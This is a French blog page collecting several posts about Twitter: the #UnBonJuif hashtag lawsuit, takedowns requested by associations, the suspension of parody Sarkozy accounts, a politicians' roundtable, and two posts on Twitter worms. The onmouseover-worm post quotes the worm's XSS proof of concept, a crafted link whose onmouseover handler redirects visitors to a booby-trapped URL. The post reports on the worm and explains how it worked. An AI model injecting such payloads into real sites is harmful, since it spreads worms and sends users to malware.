#UnBonJuif : L’UEJF commence à me tanner

twitter-black

C’était l’affaire du siècle, en fait un splendide effet flamby… Un hashtag sur Twitter dont personne n’aurait entendu parler (#UnBonJuif) si ce dernier n’avait pas été pointé du doigt par une association probablement en mal de communication et qui a décidé de le sur-médiatiser. Les tweets accompagnant ce hashtag étaient probablement manifestement antisémites (je dis probablement car je ne les ai moi même pas vu). Il était donc normal d’agir mais d’agir en faisant en sorte que ceci demeure discret. Le hic, c’est que la Ministre a suivi attirant les stroboscopes sur ce qui allait vite devenir un ouragan dans un verre d’eau.

L’affaire est pourtant bien moins grave que les appels au meutre du GUD, mais deux poids deux mesures, la lutte contre l’homophobie n’est pas une priorité pour Fleur Pellerin, la lutte contre l’antisémitisme méritait des mesures bien plus fortes… En attendant les « casseurs d’homos » on leur fout la paix, et ils continuent, impunément sur Facebook à véhiculer la haine.

Aujourd’hui, l’UEJF découvre la censure géolocalisée de twitter et reproche à Twitter de ne pas avoir retiré les tweets incriminés pour le monde entier. En pratique, les tweets incriminés ne sont pas visibles pour les utilisateurs déclarant résider en France mais le sont pour les utilisateurs déclarant résider ailleurs dans le monde. Et c’est normal attendu que Twitter, entreprise de droit américain, avec ses moyens, fait cesser l’infraction, là où elle est reconnue comme infraction, là où il y a une plainte. En outre, il faut comprendre qu’aussi bêtes que soient ces tweets, ils n’en sont pas pour autant illégaux dans de nombreux pays, dont les USA.

L’action de censurer ces tweets aux personnes se déclarant françaises sur le réseau social ce n’est pas assez pour l’UEJF qui comme le rappelle Numerama, demandait 38,5 millions d’euros de dommages et intérêts !! … Ça fait cher le tweet et le hashtag à la con.

L’UEJF a décidé de déposer une nouvelle plainte. Outre que les effets de communications là dessus commencent à me taper sur le système, outre que j’ai un peu de mal à digérer les cyber patrouilles associatives de Twitter qui se substituent à des OPJ, je commence à être blasé de ces associations qui pensent qu’elles vont se mettre à imposer leur morale ou même la législation française au monde entier.

Au lieu de poursuivre son action en accentuant la pression pour contraindre Twitter à fournir les identités des personnes se rendant coupable de propos manifestement illicites, l’UEJF continue sa campagne de communication, vous allez voir, tout est dans les mots :

« Les associations requérantes viennent de découvrir avec stupéfaction et un profond dégoût que la société Twitter avait menti au juge des référés et aux médias en affirmant avoir rendu inaccessibles les tweets en cause« .

« L’intégralité des tweets litigieux demeurent encore aujourd’hui accessibles depuis le territoire français pour quiconque se déclare de nationalité non française lors de l’ouverture ou de la modification d’un compte Twitter« 

Et Numérama de rapporter :

« Twitter fait preuve d’un rare mépris et d’une singulière arrogance » en limitant la portée de la décision française aux usagers français

De la stupéfaction, du dégoût, le « mensonge » de Twitter (qui s’efforce avec ses moyens de faire cesser l’infraction sans devenir censeur mondial), du mépris, de l’arrogance…l’UEJF ne manque pas de superlatifs. Si toi internaute tu ne te sens pas indigné après avoir lu ce communiqué, c’est que t’es un gros antisémite.

Bref l’UEJF va trop loin et tout le foin autour de cette non affaire commence à devenir ridicule. Il existe probablement des moyens plus efficaces pour contraindre Twitter à exécuter une décision de justice que ce genre de communiqués de presse comprenant des positions franchement discutables et lancés à tour de bras.

Des milices associatives pour faire la police sur Twitter ?!

BlackTwitterIconOn se demandait ce qu’elle allait bien pouvoir nous pondre notre Fleur Pellerin. La polémique faisait rage puisqu’une poignée de gros malins a trouvé opportun de médiatiser des hashtags à caractère raciste. Du coup, des hastags dont on avait jamais entendu parler ont été relayés par toutes les chaines de télévision… tandis que ça par exemple la télé et bien elle s’en fout, tout comme Bercy d’ailleurs. Cette polémique m’agaçait déjà car elle stigmatisait Twitter. Comme si la bêtise humaine s’était donnée rendez-vous sur Twitter et nul part ailleurs.

Une fois tout ceci copieusement médiatisé, il fallait bien trouver une « solution » à un problème monté en épingle de toute pièce. Et la « solution », je la découvre sur Numérama ce matin. Mon écran et mon clavier en sont encore tout maculés de café.

Pourtant un problème, il y en a bien un. Twitter est connu pour être peu enclin à collaborer avec les autorités françaises lorsqu’il s’agit de fournir des données sur un utilisateur. Twitter se cachait derrière son petit doigt en arguant qu’elle est une entreprise américaine répondant au droit américain. Mauvaise défense… car Twitter délivre un service de communication au public tel que définit dans la loi de Juin 2004 sur la confiance en l’économie numérique (LCEN).

Mais le plus grave n’est pas là, en fait le vrai  problème, c’est la « solution » trouvée par le gouvernement. La solution, c’est donc de contraindre Twitter prioriser les demandes de retraits de contenus litigieux émanant d’associations(!). A aucun moment au gouvernement une personne ne semble avoir eu l’idée de faire appliquer la loi… tout simplement.

Des associations ? Lesquelles ? Pour des délits qui relèvent du pénal ? WTF !?

Les insultes, les injures, les incitations à la haine raciale dont des délits qui relèvent du pénal. La jurisprudence est déjà bien fournie, la justice dispose de tout les outils nécessaires pour poursuivre un internaute. Au lieu de poursuivre les personnes se rendant coupables de délits qui relèvent du pénal, le gouvernement a choisi de se masquer les yeux : la censure, le retrait de contenu. Les associations concernées (tiens lesquelles d’ailleurs ? Comment sont elles choisies ? Par qui ? Est-ce que je pourrai monter ma propre association pour dénoncer les tweets discriminants anti GNU Linux et à la gloire de Lèpre OS ? Twitter va vraiment procéder à des retraits de contenus, de la censure, sur simple dénonciation d’une association ? sans intervention d’un juge ? pour des délits relevant du pénal ?

Suis-je le seul à voir là une inquiétante dérive ? Là on ne parle pas de haute autorité avec un collège composé de magistrats. On parle de personnes qui vont « juger » au doigt mouillé les tweets, « juger » de l’opportunité d’entraver la liberté d’expression et de communication des internautes. C’est un précédant qui m’inquiète sérieusement. La régulation d’Internet se fait par les internautes, les exemples de comptes abjectes sur twitter qui disparaissent en quelque minutes sur simple signalement des utilisateurs sont légion. En quoi des associations visées et tamponnées par le gouvernement seraient elles plus aptes que les internautes eux-mêmes à signaler des contenus ?

#SarkoCensure : Twitter se justifie de manière pitoyable et accentue sa censure

C’est avec une certaine tristesse que l’on peut considérer la réponse de Twitter concernant la censure de comptes parodiques visant le candidat Nicolas Sarkozy. Le réseau social est il en train de s’immiscer dans la campagne électorale pour les présidentielles ? Twitter nous gratifie de son interprétation très personnelle du délit d’usurpation d’identité : «  Nous avons reçus un rapport suivant lequel votre compte @_NicolasSarkozy commet une usurpation d’identité non parodique. Bien que Twitter croie fermement à la liberté d’expression, une imitation qui induit en erreur, prête à confusion ou trompe autrui est contre les règles de Twitter. » se justifie le réseau social pour expliquer la fermeture de l’un des comptes. Vous pourrez en juger sur pièces.
Et pendant ce temps, Twitter accentue sa censure, ce de manière proactive, comme le démontre la fermeture éclaire du compte @DehorsSarkozy avec ses 30 minutes de vie et ses 8 tweets !
Rappelons qu’il y a quelques mois, la cours d’appel d’Orléans donnait, au bout de 3 années de procédure, raison à Antoine Bardet (aka Fansolo), auteur d’un blog parodique visant le maire d’Orléans, Serge Grouard. Une décision qui a fait date et que j’avais d’ailleurs salué ici. Un réseau social a t-il à se substituer au juge, alors même que la jurisprudence lui souffle le contraire de sa décision ?
Pour protester contre cette censure, nous avons décidé de lancer une application Twitter qui modifie votre avatar, la remplaçant par un avatar du candidat Nicolas Sarkozy affublé d’un nez rouge. Happy Flamby à tous… stay tuned.

☠ En savoir plus :

LOPPSI préparait aussi la campagne électorale de Nicolas Sarkozy

Une démonstration de plus du caractère clientèliste des lois voté sous le mandat de Nicolas Sarkozy : la censure sur Twitter de comptes parodiques sur Nicolas Sarkozy. La France est devenue un pays autoritaire, il aura fallu 5 années, un seul mandat, pour que le législateur arrive à pourrir le Net en faisant reculer la liberté de la presse, le droit à la caricature, et fasse de la France une nation de renommée en matière de surveillance de masse du Net via son fond startégique d’investissement.

Aujourd’hui Internet Sans Frontière rapporte la censure par Twitter de 5 comptes hostiles à Nicolas Sarkozy. Je serai cependant mesuré (pour le moment) sur la critique de Twitter. L’entreprise est tenue de respecter la loi des pays dans lesquels elle délivre son service. En revanche je serai bien moins réservé sur le caractère ordurier mainte fois dénoncé des effets collatéraux de LOPPSI. Pour plaider sa cause, l’équipe de campagne de Nicolas Sarkozy a probablement crié au délit d’usurpation d’identité pour se faire entendre de Twitter. Ou peut être n’était-ce là qu’un classique « repport as a spam » massif des jeunes pop.

Mais la LOPPSI n’explique pas tout…

Si l’invocation de l’usurpation d’identité peut éventuellement expliquer la censure de compte @_nicolassarkozy, il n’en va pas de même pour les 4 autres comptes :

Pour ces 4 cas, rapporte ISF, pas d’usurpation d’identité, et pour au moins deux d’entre eux, un caractère parodique clairement assumé et/ou ne présentaient aucun manquement aux conditions d’utilisation du réseau social. Comment Twitter peut-il justifier la cloture de ces comptes ?

Si vous le voulez bien, nous allons donc nous livrer à une petite expérience.

Nicolas Sarkozy est sur Twitter

Twitter est de plus en plus mal fréquenté. Comme on pouvait s’y attendre, Nicolas Sarkozy a enfin son compte Twitter (vérifié). Notre président n’a manifestement pas fait preuve d’un amour fou pour les réseaux sociaux, mais voilà, à la veille des élections, pour lui, c’est un média comme un autre, un média unidirectionnel. Nicolas Sarkozy aura donc une utilisation claire de Twitter, il n’y lira rien, il y passera, par le biais de son assistant probablement, ses belles promesses électorales. Et le plus drôle c’est qu’à peine ouvert,  il a déjà plus de 5000 followers alors qu’il ne suit lui-même qu’un seul compte… celui de l’Elysée (dans le genre je m’auto-follow le nombril, on fait difficilement mieux).

Suivre le compte Twitter de Nicolas Sarkozy est donc parfaitement inutile, vous n’y découvrirez rien de plus que sur TF1.

Vous noterez que notre président croit utile (surement un bon conseil bien crétin d’un spindoctor) de signer ses tweets « NS »… proximité tout ça.

Vous pouvez toutefois essayer de lui poser des questions sur sa brillante politique numérique.

Twitter : encore un worm !

EDIT : c’est en fait un beau CSRF sur une nouvelle feature de Twitter… juste un CSRF tout pas beau et tout vieux qui est la cause de cette nouvelle propagation (voir les commentaires ci-dessous avec le code d’exploitation). Pas de risque de compromission de vos données… pour l’instant, juste une belle iframe toute sale qui ne serait jamais arrivée là avec un code propre.

Il semble que Twitter soit pour la seconde fois cette semaine victime d’une attaque. Constaté à l’instant sur l’interface web. Les timelines se retrouvent pourries de mots doux à caractére pornographique avec un joli link qui ira lui même contaminer la timeline de vos followers…

Je n’ai pas encore le détail de l’attaque mais l’url postée semble faire un truc bizarre exploitant l’API de Twitter, à vérifier.

Bref il semble que Twitter attire l’attention de beaucoup de petits malins et que l’application elle même soit gavée de trous de sécurité… Mais qu’attendent ils pour se payer un véritable audit ?

tweetattack

Twitter et le worm du onmouseover

Comme de nombreuses personnes, je me suis fait piéger en utilisant un bouton de retweet… enfin piégé, comme les contacts qui me l’ont filé et comme les contacts à qui je l’ai refilé, en fait c’est imparable, le seul moyen de l’éviter est de ne pas se rendre sur twitter.com.  Vous vous doutez bien que certains n’ont pas manqué l’occasion de me taquiner, et ils ont raison.  Leur point commun : aucun d’entre eux n’utilise l’interface web mais un client Twitter. Les clients tiers ne sont pas concernés (enfin s’ils n’executent pas de javascript douteux et non du Java comme j’ai pu le lire dans la presse). Cest bien le site web de Twitter qui est affecté et il est donc vivement recommandé de ne pas l’utiliser pour le moment, rabattez vous sur un client qui gère les script/noscript plus correctement que le site web lui même. C’est un XSS qui est actuellement exploité et que les utilisateurs se refilent gentiment. Tout ceci ne fait qu’apporter un peu plus d’eau au moulin sur une question que je m’étais posé en lisant le décret d’application HADOPI qui touche à la sécusation de sa connexion Internet :

où s’arrête la connexion Internet que je suis sensé sécuriser ?

  • Réponse A : à ma machine ?
  • Réponse B : à ma box ?
  • Réponse C : au noeud de raccordement de mon opérateur ?
  • Réponse D : au site web que je visite ?

… voici la démonstration parfaite que sécuriser une « connexion Internet » ne veut RIEN dire ! La vulnérabilité exploitée sur Twitter peut servir à compromettre des millions de données de particuliers, et donc des accès à leur LAN, ajoutez à ça que tout se retrouve en ce moment sur pastebin.. public… Sur ce point, n’en déplaise à certains experts, tout expert soient ils, plaider en faveur de la sanction des utilisateurs est une ânerie.

Je n’ai pas observé de vol de compte ou autre vol de session dans le submit de l’url générée par la connexion via le mouseover, mais une exploitation plus méchante pourrait faire beaucoup de mal. Le worm renvoi à une url piégée qui peut contaminer votre machine (je n’ai pas eu ce privilège car je ne suis pas sur Windows, je n’ai pas eu le droit à une redirection et je n’ai pas cliqué sur l’url générée), mais il serait intéressant d’aller jeter un oeil sur les malwares qui s’y trouvent.. Cependant je m’excuse auprès des follower auxquels j’ai surement transmis le tweet piégé (je l’ai aussitôt effacé de ma timeline).

La source viendrait d’un compte créé pour l’occasion @rainbowtwtr, le poc est très simple, ça nous donne un truc du type  :

http://twitter.com/pwn3d@ « onmouseover = » javascript: window.location = « http://www.urlpiegee.com ‘,’ /

… simple mais efficace. Attendez vous à des variantes aujourd’hui même qui pourraient être plus méchantes, le risque est présent tant que twitter n’aura pas corrigé la vulnérabilité exploitée sur son propre site.

Comme Google en atteste, ce worm fait mal avec plus de 18000 réponses pour le moment (Twitter étant un média social viral par excellence, c’est un terrain de choix pour la propagation de ce genre de choses).

Le conseil du moment : utilisez un client Twitter (une extension pour votre navigateur ou autre, mais ne passer pas par le site twitter.com

Twitter et les politiques

Sur l’invitation de la Cantine et de la Netscouade. je suis à la Cantine pour suivre une table ronde sur le thème « Twitter et les politiques ». L’outil de micro blogging, très en vogue chez les politiques. Parmi les invités : Nathalie Kosciusko-Morizet, Dominique Paillé (porte parole de l’UMP), Sandrine Belier (europe écologie), Alain Dolium (tête de liste IDF Modem), Lionel Tardy (Député UMP) …

La presse s’est déplacée en masse Arnaud Montebourg s’est désisté, dommage, un socialiste pro HADOPI aurait pu animer le débat, Benoit Hamon est en route, mais il a un sérieux contretemps.

Voici le live:

  • Le hashtag #tweest est créé pour l’occasion ;
  • Un flux vidéo live est également disponible  ;
  • La Netscouad nous a présenté Tweest, un outil pour suivre les discussions des tweets des politiques ;
  • NKM utilise Twitter pour prendre le poul du monde sortir des murs du ministère, créer le débat autour de l’événement ;
  • Dominique Paillé confie qu’il n’est pas le seul à écrire sur son compte Facebook ou Twitter ;
  • Alain Dolium parle du besoin d’instantanéité informatif ;
  • Lionel Tardy utilisation exclusive sur le travail parlementaire . Le député tweete beaucoup d’audition non ouvertes à la Presse ;
  • NKM : « un espace en construction il faut utiliser le meilleur sans tomber dans la dérive » ;
  • Sandrine Belier  : « le fait de voir des politiques dormir c’est pas nouveau », « préjudiciable de faire un outil de propagande » ;
  • NKM : « attirer les parlementaires vers l’Internet » ;
  • Benoit Hamon vient d’arriver (il était au procès des salariés de Continental), il est actuellement « assez abstinent », usage cyclique de Twitter, « je fais des confessions que je ne ferais pas ailleurs », c’est bien lui qui Tweet avec son compte ;
  • Question du public à NKM sur LOPPSI : la cyber manif de LOPPSI a été un petit flop (c’est vrai (96 participants).
  • NKM : débat national sur la LOPPSI. « Beaucoup de déformations sur le filtrage » « le filtrage pêrmet des cyber écoutes et non cyber perquisitions ». NKM est pour les cyber écoutes. Le filtrage n’utilisera pas Deep Paquet Inspection (normal c’est pas fait pour!), mais plutôt BGP. 15 000 personnes on dénoncé des contenus pédo porngraphiques en France cette année.
  • NKM : « la neutralité du net est un argument fourre tout » (spéciale dédicace à Numerama) ;
  • Sandrine Belier : « on commence par définir des restriction sans avoir préalablement déterminé des droits » ..
  • TECHTOC.TV monte à la charge !! : « arrêter de trouver des alibis pour filtrer les internautes » (Bravo Fred) ;
  • NKM : « on ne filtre pas du côté du récepteur : on coupe des sites sur base des signalements » … ;
  • Fabrice Epelboin : question sur le filtrage des pirates en référence à Sarkozy « dépolluer internet » : réponse de NKM à côté de la plaque qui assure que HADOPI ne filtre pas et que LOPPSI ne filtre que les sites pédophiles. NKM : « la liste noire est faite manuellement »

Loic Le Meur avoue être intervenu en faveur de Frédéric Lefèbvre sur Twitter

Image 3Loic Le Meur, le célèbre blogger avoue être intervenu en faveur de Frédéric Lefèbvre pour qu’on lui redonne accès à son compte Twitter, implicitement, il balaye d’un revers de main le mensonge de Frédéric 2.0 qui claironnait que c’est parce qu’il avait eu trop d’abonnés que Twitter avait interrompu son compte (son excuse du trafic anormal là … oui, celle à laquelle tout le monde a cru).

Du coup, Loic Le Meur est le nouveau Chuck Norris du Net, après Jean Sarkozy, Frédéric Lefèbvre, le bloggueur entreprenaute et organisateur du seul pince-fesse IT à plus de 1000 euros dans lequel on peut même pas se connecter en Wifi, déchaîne les foules sur Twitter … trop la classe Loic.

Au fait j’aime pas trop le jaune dans le logo de Google, tu peux pas passer un petit coup de fil à Mountain View pour moi stp ?

FLefebvre_UMP est vraiment de retour sur Twitter

Et hop, nouveau background non pixelisé, ton tout de suite plus sympathique, Frédéric 2.0 réenclenche la seconde. Laissons lui sa chance, nous verrons bien s’il confond toujours Twitter avec Reuters.

Rappel à tous : Twitter est un espace ouvert de discussion, nous avons tous plein de chose à demander à Frédéric, encore plus à lui faire comprendre. En ce sens l’exclusion ne peut être une bonne démarche. Et puis avouez… il est souvent drôle non ? Ne nous privons pas des bons moments qu’il nous laisse augurer. Bon c’est con, ma candidature en tant que porte parole de l’UMP tombe à l’eau du coup. Un porte parole ça va, c’est quand il y en a plusieurs qu’on a des problèmes …

Image 3

EDIT :

Décidément, quand ça veut pas … ça veut pas

TUPDTQM … VDM

Image 5

Ça me rappelle Desirs D’avenir 🙂